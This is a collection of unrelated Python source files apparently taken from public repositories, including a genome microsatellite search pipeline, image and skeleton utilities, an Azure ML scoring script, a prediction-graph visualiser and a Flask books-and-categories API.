yield (r.seqid, r.start, r.end, '3UTR', r.attrs.ID)
elif r.feature == 'EXON':
try:
mother = r.attrs.PARENT
except AttributeError:
continue
if father == mother:
exons.append((r.seqid, r.start, r.end, 'exon', parents[r.attrs.PARENT]))
else:
if exons:
exons = sorted(exons, key=lambda x: x[2])
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (exons[0][0], start, end, 'intron', parents[r.attrs.PARENT])
exons = [(r.seqid, r.start, r.end, 'exon', parents[r.attrs.PARENT])]
father = mother
else:
if 'ID' in r.attrs:
try:
parents[r.attrs.ID] = parents[r.attrs.PARENT]
except:
parents[r.attrs.ID] = r.attrs.ID
exons = sorted(exons, key=lambda x: x[2])
for idx, exon in enumerate(exons):
yield exon
if idx < len(exons)-1:
start = exon[2] + 1
end = exons[idx+1][1] - 1
yield (exons[0][0], start, end, 'intron', exons[0][4])
TABLE_SQL = """
CREATE TABLE sequence(
id INTEGER,
name TEXT,
accession TEXT
);
CREATE TABLE ssr(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
motif TEXT,
standard_motif TEXT,
ssr_type INTEGER,
repeats INTEGER,
length INTEGER
);
CREATE TABLE ssrmeta(
ssr_id INTEGER PRIMARY KEY,
left_flank TEXT,
right_flank TEXT
);
CREATE TABLE gene(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
gid TEXT,
name TEXT,
biotype TEXT,
dbxref TEXT
);
CREATE TABLE ssrannot(
ssr_id INTEGER PRIMARY KEY,
gene_id INTEGER,
location INTEGER
);
CREATE TABLE cssr(
id INTEGER PRIMARY KEY,
sequence_id INTEGER,
start INTEGER,
end INTEGER,
complexity INTEGER,
length INTEGER,
structure TEXT
);
CREATE TABLE cssrmeta(
cssr_id INTEGER PRIMARY KEY,
left_flank TEXT,
right_flank TEXT
);
CREATE TABLE cssrannot(
cssr_id INTEGER PRIMARY KEY,
gene_id INTEGER,
location INTEGER
);
CREATE TABLE summary(
id INTEGER PRIMARY KEY,
option TEXT,
content TEXT
);
"""
INDEX_SQL = """
CREATE INDEX seq_name ON sequence (name);
CREATE INDEX seq_acc ON sequence (accession);
CREATE INDEX ssr_seq_id ON ssr (sequence_id);
CREATE INDEX ssr_start ON ssr (start);
CREATE INDEX ssr_end ON ssr (end);
CREATE INDEX ssr_motif ON ssr (motif);
CREATE INDEX ssr_smotif ON ssr (standard_motif);
CREATE INDEX ssr_stype ON ssr (ssr_type);
CREATE INDEX ssr_rep ON ssr (repeats);
CREATE INDEX ssr_len ON ssr (length);
CREATE INDEX ssr_annot_gene_id ON ssrannot (gene_id);
CREATE INDEX ssr_annot_location ON ssrannot (location);
CREATE INDEX ssr_annot_ssr_gene ON ssrannot (ssr_id, gene_id);
CREATE INDEX ssr_annot_ssr_gene_loc ON ssrannot (ssr_id, gene_id, location);
CREATE INDEX cssr_seq_id ON cssr (sequence_id);
CREATE INDEX cssr_start ON cssr (start);
CREATE INDEX cssr_end ON cssr (end);
CREATE INDEX cssr_cplx ON cssr (complexity);
CREATE INDEX cssr_len ON cssr (length);
CREATE INDEX cssr_annot_gene_id ON cssrannot (gene_id);
CREATE INDEX cssr_annot_location ON cssrannot (location);
CREATE INDEX cssr_annot_cssr_gene ON cssrannot (cssr_id, gene_id);
CREATE INDEX cssr_annot_cssr_gene_loc ON cssrannot (cssr_id, gene_id, location);
"""
WORK_DIR = Config.ROOT_DIR
DB_DIR = os.path.join(WORK_DIR, 'dbs')
FA_DIR = os.path.join(WORK_DIR, 'fastas')
AR_DIR = os.path.join(WORK_DIR, 'assemblyreports')
GFF_DIR = os.path.join(WORK_DIR, 'gffs')
def search_for_ssrs(acc, sub_dir):
#standard motif
motifs = MotifStandard(2)
out_dir = os.path.join(DB_DIR, sub_dir)
db_file = os.path.join(out_dir, '{}.db'.format(acc))
fa_file = os.path.join(FA_DIR, sub_dir, '{}.fna.gz'.format(acc))
ar_file = os.path.join(AR_DIR, sub_dir, '{}.assembly_report.txt'.format(acc))
gff_file = os.path.join(GFF_DIR, sub_dir, '{}.gff.gz'.format(acc))
if not os.path.exists(fa_file):
raise Exception('{} does not exists'.format(fa_file))
#if database file exists, remove and redo search for SSRs
if os.path.exists(db_file):
os.remove(db_file)
#connect to database and create tables
conn = sqlite3.connect(db_file)
cursor = conn.cursor()
cursor.executescript(TABLE_SQL)
#write speedup
cursor.execute("PRAGMA synchronous = OFF;")
cursor.execute("PRAGMA journal_mode = MEMORY;")
cursor.execute("PRAGMA cache_size = 10000;")
cursor.execute("BEGIN;")
##parse assembly report
#specifiy accession column
if acc.startswith('GCF'):
accn_col = 6
else:
accn_col = 4
seqs_mapping = {}
num = 0
mitochondrion = None
rows = []
if os.path.exists(ar_file):
with open(ar_file) as fh:
for line in fh:
if line[0] == '#':
continue
if not line.strip():
continue
cols = line.strip().split('\t')
name = cols[0]
#genbank or refseq accession number
accn = cols[accn_col]
num += 1
if 'mitochondrion' in cols[3].lower():
mitochondrion = accn
seqs_mapping[accn] = num
if 'chromosome' in cols[3].lower():
if cols[0].isdigit() and len(cols[0]) <= 2:
name = 'Chr{}'.format(cols[0])
elif cols[0] in ['X', 'Y', 'W', 'Z']:
name = 'Chr{}'.format(cols[0])
rows.append((num, name, accn))
#if assembly report file is empty, get sequence name from fasta file
if not rows:
with gzip.open(fa_file, 'rt') as fa:
for line in fa:
if line[0] == '>':
num += 1
name = line[1:].strip().split()[0]
seqs_mapping[name] = num
rows.append((num, name, name))
#refseq-accn column is empty
elif '' in seqs_mapping:
seqname_to_gbaccn = {}
with open(ar_file) as fh:
for line in fh:
if line[0] == '#':
continue
if not line.strip():
continue
cols = line.strip().split('\t')
seqname_to_gbaccn[cols[0]] = cols[4]
with gzip.open(fa_file, 'rt') as fa:
for line in fa:
if line[0] == '>':
num += 1
refacc = line[1:].strip().split()[0]
seqs_mapping[refacc] = num
for k,v in seqname_to_gbaccn.items():
if (k.strip() and k in line) or (v.strip() and v in line):
name = k.strip() or v.strip()
rows.append((num, name, refacc))
cursor.executemany("INSERT INTO sequence VALUES (?,?,?)", rows)
##Search for microsatellites and extract flanking sequence
base_count = 0
atgc_count = 0
gc_count = 0
at_count = 0
seq_count = 0
for seqid, seq in kseq.fasta(fa_file):
if seqid == mitochondrion:
continue
seq_count += 1
base_count += len(seq)
bases = collections.Counter(seq)
gc_count += bases['G'] + bases['C']
atgc_count += bases['G'] + bases['C'] + bases['A'] + bases['T']
#Search for perfect microsatellites
ssrs = tandem.search_ssr(seq, min_tandem_repeats)
if not ssrs:
continue
def iter_ssr():
for ssr in ssrs:
yield (None, seqs_mapping[seqid], ssr[3], ssr[4], ssr[0], motifs.get_standard(ssr[0]), ssr[1], ssr[2], ssr[5])
conn.cursor().executemany("INSERT INTO ssr VALUES (?,?,?,?,?,?,?,?,?)", iter_ssr())
#extract flanking sequence for SSRs
def iter_flank():
for row in cursor.execute("SELECT * FROM ssr WHERE sequence_id=?", (seqs_mapping[seqid],)):
s = row[2] - 100 - 1
if s < 0:
s = 0
left = seq[s:row[2]-1]
right = seq[row[3]:row[3]+100]
yield (row[0], left, right)
conn.cursor().executemany("INSERT INTO ssrmeta VALUES (?,?,?)", iter_flank())
#search for compound microsatellites
def iter_cssr():
cssrs = [ssrs[0]]
for ssr in ssrs[1:]:
d = ssr[3] - cssrs[-1][4] - 1
if d<= 10:
cssrs.append(ssr)
else:
if len(cssrs) > 1:
yield concatenate_cssr(seqs_mapping[seqid], seq, cssrs)
cssrs = [ssr]
if len(cssrs) > 1:
yield concatenate_cssr(seqs_mapping[seqid], seq, cssrs)
conn.cursor().executemany("INSERT INTO cssr VALUES (?,?,?,?,?,?,?)", iter_cssr())
#extract flanking sequence for cSSRs
def iter_cflank():
for row in cursor.execute("SELECT * FROM cssr WHERE sequence_id=?", (seqs_mapping[seqid],)):
s = row[2] - 100 - 1
if s < 0:
s = 0
left = seq[s:row[2]-1]
right = seq[row[3]:row[3]+100]
yield (row[0], left, right)
conn.cursor().executemany("INSERT INTO cssrmeta VALUES (?,?,?)", iter_cflank())
#if annotation file exists, mapping ssr in gene
if os.path.exists(gff_file):
#extract all genes from gff annotation file
gene_mapping = {}
def iter_gene():
gene_num = 0
for row in gff_parser(gff_file):
if row.feature == 'REGION':
continue
if row.feature != 'GENE':
if 'PARENT' in row.attrs:
continue
gene_num += 1
if 'ID' in row.attrs:
gid = row.attrs.ID
elif 'GENE' in row.attrs:
gid = row.attrs.GENE
elif 'NAME' in row.attrs:
gid = row.attrs.NAME
else:
raise Exception(row)
gene_mapping[gid] = gene_num
if row.seqid not in seqs_mapping:
continue
seqid = seqs_mapping[row.seqid]
if 'NAME' in row.attrs:
gname = row.attrs.NAME
elif 'PRODUCT' in row.attrs:
gname = row.attrs.PRODUCT
elif 'GENE' in row.attrs:
gname = row.attrs.GENE
elif 'ID' in row.attrs:
gname = row.attrs.ID
else:
raise Exception(row)
biotype = row.attrs.get('GENE_BIOTYPE', row.feature)
dbxref = row.attrs.get('DBXREF', '')
yield (gene_num, seqid, row.start, row.end, gid, gname, biotype, dbxref)
conn.cursor().executemany("INSERT INTO gene VALUES (?,?,?,?,?,?,?,?)", iter_gene())
#do mapping
interval_forest = {}
locations = {}
locid = 0
prev_chrom = None
starts = []
ends = []
indexes = []
for feature in get_gff_coordinate(gff_file):
locid += 1
locations[locid] = feature[3:]
if feature[0] != prev_chrom:
if starts:
starts = numpy.array(starts, dtype=numpy.long)
ends = numpy.array(ends, dtype=numpy.long)
indexes = numpy.array(indexes, dtype=numpy.long)
interval_forest[prev_chrom] = ncls.NCLS(starts, ends, indexes)
prev_chrom = feature[0]
starts = []
ends = []
indexes = []
starts.append(feature[1])
ends.append(feature[2])
indexes.append(locid)
if starts:
starts = numpy.array(starts, dtype=numpy.long)
ends = numpy.array(ends, dtype=numpy.long)
indexes = numpy.array(indexes, dtype=numpy.long)
interval_forest[prev_chrom] = ncls.NCLS(starts, ends, indexes)
feature_to_id = {'CDS': 1, 'exon': 2, '3UTR': 3, 'intron': 4, '5UTR': 5}
candidates = ['CDS', 'exon', 'UTR', 'intron']
seqid_to_name = dict(zip(seqs_mapping.values(), seqs_mapping.keys()))
#mapping ssr
mappings = []
for ssr in cursor.execute("SELECT * FROM ssr"):
seqname = seqid_to_name[ssr[1]]
if seqname not in interval_forest:
continue
res = set(interval_forest[seqname].find_overlap(ssr[2], ssr[3]))
if not res:
continue
feats = [locations[fid[2]] for fid in res]
for candidate in candidates:
for feat, gid in feats:
if candidate in feat:
mappings.append((ssr[0], gene_mapping[gid], feature_to_id[feat]))
break
else:
continue
break
conn.cursor().executemany("INSERT INTO ssrannot VALUES (?,?,?)", mappings)
#mapping cssr
mappings = []
for ssr in cursor.execute("SELECT * FROM cssr"):
seqname = seqid_to_name[ssr[1]]
if seqname not in interval_forest:
continue
res = set(interval_forest[seqname].find_overlap(ssr[2], ssr[3]))
if not res:
continue
feats = [locations[fid[2]] for fid in res]
for candidate in candidates:
for feat, gid in feats:
if candidate in feat:
mappings.append((ssr[0], gene_mapping[gid], feature_to_id[feat]))
break
else:
continue
break
conn.cursor().executemany("INSERT INTO cssrannot VALUES (?,?,?)", mappings)
#statistics
def set_option(name, val):
conn.cursor().execute("INSERT INTO summary VALUES (?,?,?)", (None, name, val))
def get_one(sql):
cur = conn.cursor()
for row in cur.execute(sql):
if row[0] is None:
return 0
return row[0]
return 0
set_option('genome_size', base_count)
set_option('valid_size', atgc_count)
set_option('seq_count', seq_count)
set_option('ns_count', base_count-atgc_count)
set_option('gc_content', round(gc_count/atgc_count*100, 2))
#SSR Statistics
ssr_count = get_one("SELECT COUNT(*) FROM ssr LIMIT 1")
if ssr_count > 0:
set_option('ssr_count', ssr_count)
ssr_length = get_one("SELECT SUM(length) FROM ssr LIMIT 1")
set_option('ssr_length', ssr_length)
ssr_average = ssr_length/ssr_count
set_option('ssr_average', ssr_average)
ssr_frequency = ssr_count/(atgc_count/1000000)
set_option('ssr_frequency', ssr_frequency)
ssr_density = ssr_length/(atgc_count/1000000)
set_option('ssr_density', ssr_density)
genome_cover= ssr_length/atgc_count*100
set_option('genome_cover', genome_cover)
set_option('ssr_perseq', ssr_count/seq_count)
ssr_category = 0
for row in cursor.execute("SELECT COUNT(DISTINCT standard_motif) FROM ssr"):
ssr_category = row[0]
set_option('ssr_category', ssr_category)
ssr_maxrep = ''
for row in cursor.execute("SELECT motif, max(repeats) FROM ssr"):
ssr_maxrep = '{} / {}'.format(row[1], row[0])
set_option('ssr_maxrep', ssr_maxrep)
ssr_maxlen = ''
for row in cursor.execute("SELECT motif, max(length) FROM ssr"):
ssr_maxlen = '{} / {}'.format(row[1], row[0])
set_option('ssr_maxlen', ssr_maxlen)
types = {1: 'Mono', 2: 'Di', 3: 'Tri', 4: 'Tetra', 5: 'Penta', 6: 'Hexa'}
res = {types[row[0]]: row[1] for row in cursor.execute("SELECT ssr_type, count(*) FROM ssr GROUP BY ssr_type")}
set_option('ssr_types', json.dumps(res))
feats = {1: 'CDS', 2: 'exon', 3: '3UTR', 4: 'intron', 5: '5UTR'}
res = {feats[row[0]]: row[1] for row in cursor.execute("SELECT location, COUNT(*) FROM ssrannot GROUP BY location")}
set_option('ssr_location', json.dumps(res))
res = {row[0]: row[1] for row in cursor.execute("SELECT standard_motif, COUNT(*) FROM ssr GROUP BY standard_motif")}
set_option('ssr_motif', json.dumps(res))
res = {}
for i in range(1, 7):
res[types[i]] = {row[0]: row[1] for row in cursor.execute("SELECT repeats, COUNT(*) FROM ssr WHERE ssr_type=? GROUP BY repeats", (i,))}
set_option('ssr_repdis', json.dumps(res))
res = {}
for i in range(1, 7):
res[types[i]] = {row[0]: row[1] for row in cursor.execute("SELECT length, COUNT(*) FROM ssr WHERE ssr_type=? GROUP BY length", (i,))}
set_option('ssr_lendis', json.dumps(res))
#Compound microsatellite statistics
cm_count = get_one("SELECT COUNT(*) FROM cssr LIMIT 1")
if cm_count > 0:
set_option('cm_count', cm_count)
cssr_count = get_one("SELECT SUM(complexity) FROM cssr LIMIT 1")
set_option('cssr_count', cssr_count)
cssr_length = get_one("SELECT SUM(length) FROM cssr LIMIT 1")
set_option('cssr_length', cssr_length)
cssr_average = cssr_length/cm_count
set_option('cssr_average', cssr_average)
cssr_percent = cssr_count/ssr_count*100
set_option('cssr_percent', cssr_percent)
cssr_frequency = cm_count/(atgc_count/1000000)
set_option('cssr_frequency', cssr_frequency)
cssr_density = cssr_length/(atgc_count/100000)
set_option('cssr_density', cssr_density)
cssr_perseq = cm_count/seq_count*100
set_option('cssr_perseq', cssr_perseq)
cssr_maxlen = get_one("SELECT MAX(length) FROM cssr")
set_option('cssr_maxlen', cssr_maxlen)
cssr_maxcpl = get_one("SELECT MAX(complexity) FROM cssr")
set_option('cssr_maxcpl', cssr_maxcpl)
res = {row[0]: row[1] for row in cursor.execute("SELECT complexity, COUNT(*) FROM cssr GROUP BY complexity")}
set_option('cssr_cpldis', json.dumps(res))
res = {row[0]: row[1] for row in cursor.execute("SELECT length, COUNT(*) FROM cssr GROUP BY length")}
set_option('cssr_lendis', json.dumps(res))
cursor.executescript(INDEX_SQL)
conn.commit()
conn.close()
manager = multiprocessing.Manager()
event = manager.Event()
tasks = manager.Queue(150)
lock = manager.Lock()
def worker(logfile):
while 1:
if event.is_set() and tasks.empty():
break
if tasks.empty():
time.sleep(0.01)
continue
try:
try:
acc, sub_dir = tasks.get_nowait()
except queue.Empty:
time.sleep(0.01)
continue
search_for_ssrs(acc, sub_dir)
except:
print('{}\tFailure'.format(acc))
print(traceback.print_exc())
os.killpg(os.getpgid(os.getpid()), signal.SIGKILL)
print('{}\tSuccess'.format(acc))
lock.acquire()
with open(logfile, 'a') as fh:
fh.write('{}\n'.format(acc))
lock.release()
return
if __name__ == '__main__':
## main process started ##
genome_accession_list_file, progress_log_file, cpu_count = sys.argv[1:]
cpu_count = int(cpu_count)
#breakpoint resume
finished = {}
if os.path.exists(progress_log_file):
with open(progress_log_file) as fh:
finished = {line.strip() for line in fh}
genomes = {}
with open(genome_accession_list_file) as fh:
rows = csv.reader(fh, delimiter='\t')
for row in rows:
#accession of genomes list in column 15
genomes[row[15]] = row
pool = multiprocessing.Pool(cpu_count)
for i in range(cpu_count):
pool.apply_async(worker, (progress_log_file,))
for acc, info in genomes.items():
if acc in finished:
continue
if ',' in info[4]:
info[4] = info[4].split(',')[0]
sub_dir = os.path.join(*info[3:6]).replace(' ', '_')
out_dir = os.path.join(DB_DIR, sub_dir)
make_folder(out_dir)
while 1:
try:
tasks.put_nowait((acc, sub_dir))
break
except queue.Full:
time.sleep(0.01)
event.set()
pool.close()
pool.join()
| 2.203125 | 2 |
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_NumPy_Summations_2.txt.py | webdevhub42/Lambda | 5 | 12770763 | import numpy as np
arr1 = np.array([1, 2, 3])
arr2 = np.array([1, 2, 3])
newarr = np.sum([arr1, arr2])
print(newarr)
| 3.234375 | 3 |
nobos_commons/tools/skeleton_converters/skeleton_converter_openpose_to_stickman.py | noboevbo/nobos_commons | 2 | 12770764 | <reponame>noboevbo/nobos_commons
from nobos_commons.data_structures.skeletons.joint_2d import Joint2D
from nobos_commons.data_structures.skeletons.skeleton_openpose import SkeletonOpenPose
from nobos_commons.data_structures.skeletons.skeleton_stickman import SkeletonStickman
from nobos_commons.tools.skeleton_converters.skeleton_converter_base import SkeletonConverter
from nobos_commons.utils.joint_helper import get_middle_joint
class SkeletonConverterOpenPoseToStickman(SkeletonConverter):
def get_converted_skeleton(self, skeleton_openpose: SkeletonOpenPose) -> SkeletonStickman:
skeleton_stickman: SkeletonStickman = self._get_skeleton_from_joints(skeleton_openpose)
self._set_calculated_joints(skeleton_stickman)
return skeleton_stickman
# Private methods
def _get_skeleton_from_joints(self, skeleton_openpose: SkeletonOpenPose) -> SkeletonStickman:
skeleton_stickman: SkeletonStickman = SkeletonStickman()
for joint in skeleton_openpose.joints:
if hasattr(skeleton_stickman.joints, joint.name):
skeleton_stickman.joints[joint.name].copy_from(joint, allow_different_num=True)
return skeleton_stickman
def _set_calculated_joints(self, skeleton_stickman: SkeletonStickman):
calculated_hip_center: Joint2D = get_middle_joint(joint_a=skeleton_stickman.joints.left_hip,
joint_b=skeleton_stickman.joints.right_hip)
if calculated_hip_center is not None:
skeleton_stickman.joints.hip_center.copy_from(calculated_hip_center)
| 2.1875 | 2 |
mots_vides/tests/shortcut.py | Fantomas42/mots-vides | 13 | 12770765 | <reponame>Fantomas42/mots-vides<filename>mots_vides/tests/shortcut.py
"""
Tests for shortcuts
"""
from unittest import TestCase
from mots_vides import stop_words
from mots_vides.stop_words import StopWord
from mots_vides.exceptions import StopWordError
class StopWordShortcutTestCase(TestCase):
def test_stop_words(self):
self.assertTrue(isinstance(stop_words('french'), StopWord))
self.assertTrue(isinstance(stop_words('klingon'), StopWord))
self.assertRaises(StopWordError, stop_words, 'klingon', False)
| 2.359375 | 2 |
rastervision_core/rastervision/core/utils/misc.py | theoway/raster-vision | 1,577 | 12770766 | <reponame>theoway/raster-vision
import io
from pydantic import confloat
from PIL import Image
import numpy as np
import imageio
import logging
Proportion = confloat(ge=0, le=1)
log = logging.getLogger(__name__)
def save_img(im_array, output_path):
imageio.imwrite(output_path, im_array)
def numpy_to_png(array: np.ndarray) -> str:
"""Get a PNG string from a Numpy array.
Args:
array: A Numpy array of shape (w, h, 3) or (w, h), where the
former is meant to become a three-channel image and the
latter a one-channel image. The dtype of the array
should be uint8.
Returns:
str
"""
im = Image.fromarray(array)
output = io.BytesIO()
im.save(output, 'png')
return output.getvalue()
def png_to_numpy(png: str, dtype=np.uint8) -> np.ndarray:
"""Get a Numpy array from a PNG string.
Args:
png: A str containing a PNG-formatted image.
Returns:
numpy.ndarray
"""
incoming = io.BytesIO(png)
im = Image.open(incoming)
return np.array(im)
| 2.8125 | 3 |
python-sdk/experimental/deploy-triton/src/score_densenet.py | 0mza987/azureml-examples | 331 | 12770767 | <gh_stars>100-1000
import io
import numpy as np
import os
from azureml.core import Model
from azureml.contrib.services.aml_request import rawhttp
from azureml.contrib.services.aml_response import AMLResponse
from PIL import Image
from onnxruntimetriton import InferenceSession
def preprocess(img, scaling): # , dtype):
"""Pre-process an image to meet the size, type and format
requirements specified by the parameters.
"""
c = 3
h = 224
w = 224
format = "FORMAT_NCHW"
if c == 1:
sample_img = img.convert("L")
else:
sample_img = img.convert("RGB")
resized_img = sample_img.resize((w, h), Image.BILINEAR)
resized = np.array(resized_img)
if resized.ndim == 2:
resized = resized[:, :, np.newaxis]
# npdtype = triton_to_np_dtype(dtype)
typed = resized.astype(np.float32)
# typed = resized
if scaling == "INCEPTION":
scaled = (typed / 128) - 1
elif scaling == "VGG":
if c == 1:
scaled = typed - np.asarray((128,), dtype=npdtype)
else:
scaled = typed - np.asarray((123, 117, 104), dtype=npdtype)
else:
scaled = typed
# Swap to CHW if necessary
if format == "FORMAT_NCHW":
ordered = np.transpose(scaled, (2, 0, 1))
else:
ordered = scaled
# Channels are in RGB order. Currently model configuration data
# doesn't provide any information as to other channel orderings
# (like BGR) so we just assume RGB.
return ordered
def postprocess(output_array):
"""Post-process results to show the predicted label."""
output_array = output_array[0]
max_label = np.argmax(output_array)
final_label = label_dict[max_label]
return f"{max_label} : {final_label}"
def init():
global session, label_dict
session = InferenceSession(path_or_bytes="densenet_onnx")
model_dir = os.path.join(os.environ["AZUREML_MODEL_DIR"], "models")
folder_path = os.path.join(model_dir, "triton", "densenet_onnx")
label_path = os.path.join(
model_dir, "triton", "densenet_onnx", "densenet_labels.txt"
)
label_file = open(label_path, "r")
labels = label_file.read().split("\n")
label_dict = dict(enumerate(labels))
@rawhttp
async def run(request):
"""This function is called every time your webservice receives a request.
Notice you need to know the names and data types of the model inputs and
outputs. You can get these values by reading the model configuration file
or by querying the model metadata endpoint.
"""
if request.method == "POST":
outputs = []
for output in session.get_outputs():
outputs.append(output.name)
input_name = session.get_inputs()[0].name
reqBody = await request.get_data()
img = Image.open(io.BytesIO(reqBody))
image_data = preprocess(img, scaling="INCEPTION")
res = session.run(outputs, {input_name: image_data})
result = postprocess(output_array=res)
return AMLResponse(result, 200)
else:
return AMLResponse("bad request", 500)
| 2.28125 | 2 |
visualize_predictions_graph.py | jmhessel/multi-retrieval | 28 | 12770768 | '''
for i in predictions/test/*; do python visualize_predictions.py $i\/doc.json $i/pred_weights.npy prediction_dir/$i ; done;
'''
import argparse
import numpy as np
import bipartite_utils
import json
import os
import subprocess
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('document')
parser.add_argument('predictions')
parser.add_argument('output')
parser.add_argument('--n_to_show', default=5)
return parser.parse_args()
def call(x):
subprocess.call(x, shell=True)
def main():
args = parse_args()
pred_adj = np.load(args.predictions)
with open(args.document) as f:
data = json.loads(f.read())
images, text = data[0], data[1]
solve_fn = bipartite_utils.generate_fast_hungarian_solving_function()
sol = solve_fn(pred_adj, args.n_to_show)
scores = pred_adj[sol[:,0], sol[:,1]]
true_adj = np.zeros((len(text), len(images)))
for text_idx, t in enumerate(text):
if t[1] == -1: continue
true_adj[text_idx, t[1]] = 1
for image_idx, t in enumerate(images):
if t[1] == -1: continue
true_adj[t[1], image_idx] = 1
auc = 100 * roc_auc_score(true_adj.flatten(),
pred_adj.flatten())
print('AUC: {:.2f} {}'.format(auc,
data[-1]))
ordered_images, ordered_sentences = [], []
for img_idx, sent_idx, sc in sorted(
zip(sol[:,1], sol[:,0], scores), key=lambda x:-x[-1])[:args.n_to_show]:
ordered_images.append(img_idx)
ordered_sentences.append(sent_idx)
print(sc)
pred_adj_subgraph = pred_adj[np.array(ordered_sentences),:][:,np.array(ordered_images)]
true_adj_subgraph = true_adj[np.array(ordered_sentences),:][:,np.array(ordered_images)]
selected_images = [images[img_idx][0] for img_idx in ordered_images]
selected_sentences = [text[sent_idx][0] for sent_idx in ordered_sentences]
# normalize predicted sims to have max 1 and min 0
# first, clip out negative values
pred_adj_subgraph = np.clip(pred_adj_subgraph, 0, 1.0)
pred_adj_subgraph -= np.min(pred_adj_subgraph.flatten())
pred_adj_subgraph /= np.max(pred_adj_subgraph.flatten())
assert np.min(pred_adj_subgraph.flatten()) == 0.0
assert np.max(pred_adj_subgraph.flatten()) == 1.0
print(pred_adj_subgraph.shape)
print(ordered_images)
print(ordered_sentences)
print(selected_images)
print(selected_sentences)
# each line has ((x1, y1, x2, y2), strength, correctness)
# images go above text
lines_to_plot = []
image_text_gap = 2
same_mode_gap = 2
offdiag_alpha_mul = .5
def cosine_to_width(cos, exp=2.0, maxwidth=8.0):
return cos**exp * maxwidth
def cosine_to_alpha(cos, exp=1/2., maxalpha=1.0):
return cos**exp * maxalpha
correct_color, incorrect_color = '#1b7837', '#762a83'
lines_to_plot = []
for text_idx in range(args.n_to_show):
for image_idx in range(args.n_to_show):
coords = (text_idx*same_mode_gap, 0, image_idx*same_mode_gap, image_text_gap)
strength = max(pred_adj_subgraph[text_idx, image_idx], 0)
correctness = true_adj_subgraph[text_idx, image_idx] == 1
lines_to_plot.append((coords, strength, correctness))
plt.figure(figsize=(args.n_to_show*same_mode_gap, image_text_gap))
for (x1, y1, x2, y2), strength, correct in sorted(lines_to_plot,
key=lambda x: x[1]):
if x1 == x2: continue
plt.plot([x1, x2], [y1, y2],
linewidth=cosine_to_width(strength),
alpha=cosine_to_alpha(strength) * offdiag_alpha_mul,
color=correct_color if correct else incorrect_color)
for (x1, y1, x2, y2), strength, correct in sorted(lines_to_plot,
key=lambda x: x[1]):
if x1 != x2: continue
plt.plot([x1, x2], [y1, y2],
linewidth=cosine_to_width(strength),
color=correct_color if correct else incorrect_color)
plt.axis('off')
plt.tight_layout()
if not os.path.exists(args.output):
os.makedirs(args.output)
with open(args.output + '/sentences.txt', 'w') as f:
f.write('\n'.join([' '.join(s.split()) for s in selected_sentences]))
with open(args.output + '/images.txt', 'w') as f:
f.write('\n'.join(selected_images))
with open(args.output + '/all_sentences.txt', 'w') as f:
f.write('\n'.join([' '.join(s[0].split()) for s in text]))
with open(args.output + '/all_images.txt', 'w') as f:
f.write('\n'.join([x[0] for x in images]))
with open(args.output + '/auc.txt', 'w') as f:
f.write('{:.4f}'.format(auc))
plt.savefig(args.output + '/graph.png', dpi=300)
call('convert {} -trim {}'.format(args.output + '/graph.png',
args.output + '/graph_cropped.png'))
if __name__ == '__main__':
main()
| 2.28125 | 2 |
app.py | EmmanuelleAD/api_livres_categories_iai | 0 | 12770769 | <filename>app.py
import os
from flask import Flask,abort,jsonify,request
from flask_sqlalchemy import SQLAlchemy
from dotenv import load_dotenv
from datetime import datetime
load_dotenv()
username=os.getenv('user')
mdp=os.getenv('pswd')
host=os.getenv('host')
app=Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI']='postgresql://{}:{}@:5432/bdlivre'.format(username,mdp,host)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
db=SQLAlchemy(app)
class Categorie(db.Model):
__tablename__='categories'
id=db.Column(db.Integer,primary_key=True)
libelle_categorie=db.Column(db.String(128),nullable=False)
livres=db.relationship('Livre',backref='categories',lazy=True)
def __init__(self,libelle_categorie):
self.libelle_categorie=libelle_categorie
def inserer_categorie(self):
db.session.add(self)
db.session.commit()
def modifier_categorie(self):
db.session.commit()
def supprimer_categorie(self):
db.session.delete(self)
db.session.commit()
def categorie_format(self):
return({
'id':self.id,
'categorie':self.libelle_categorie
})
class Livre(db.Model):
__tablename__='livres'
id=db.Column(db.Integer,primary_key=True)
isbn=db.Column(db.String(20),unique=True)
titre=db.Column(db.String(60),nullable=False)
date_publication=db.Column(db.DateTime)
auteur=db.Column(db.String(100),nullable=False)
editeur=db.Column(db.String(100),nullable=False)
categorie_id=db.Column(db.Integer,db.ForeignKey('categories.id'),nullable=False)
def __init__(self,isbn,titre,date_publication,auteur,editeur,categorie_id):
self.isbn=isbn
self.titre=titre
self.date_publication=date_publication
self.auteur=auteur
self.editeur=editeur
self.categorie_id=categorie_id
def inserer_livre(self):
db.session.add(self)
db.session.commit()
def modifier_livre(self):
db.session.commit()
def supprimer_livre(self):
db.session.delete(self)
db.session.commit()
def livre_format(self):
return({
'id':self.id,
'isbn':self.isbn,
'titre':self.titre,
'date': self.date_publication,
'auteur':self.auteur,
'editeur':self.editeur,
'categorie':self.categorie_id
})
db.create_all()
###Lister tous les livres
@app.route('/livres',methods=['GET'])
def get_all_books():
livres=Livre.query.all()
liv_format=[l.livre_format() for l in livres]
return jsonify({
'succes':True,
'livres':liv_format,
'total':Livre.query.count()
})
###Chrcher un livre avec son id
@app.route('/livres/<int:id>',methods=['GET'])
def get_one_book(id):
try:
livre=Livre.query.get(id)
if livre is None:
abort(404)
else:
return jsonify({
'success':True,
'livre demandé ':livre.livre_format()
})
except :
abort(400)
###La liste des livres d'une categorie
@app.route('/categories/<int:id>/livres',methods=['GET'])
def one_category_books(id):
try:
livres_cat=Livre.query.filter_by(categorie_id=id)
if livres_cat is None:
abort(404)
else:
livres_cat_format=[l.livre_format() for l in livres_cat]
nom_cat=Categorie.query.get(id).libelle_categorie
return jsonify({
'Categorie_id':id,
'Nom categorie':nom_cat,
'Livres':livres_cat_format,
'Total_livre_categorie':livres_cat.count()
})
except :
abort(400)
##Lister une categorie
@app.route('/categories/<int:id>',methods=['GET'])
def get_one_category(id):
try:
categorie=Categorie.query.get(id)
if categorie is None:
abort(404)
else:
return jsonify({
'Success':True,
'Categorie':categorie.categorie_format(),
})
except :
abort(400)
##Chrcher une categorie par son id
"""
@app.route('/categories/<int:id>',methods=['GET'])
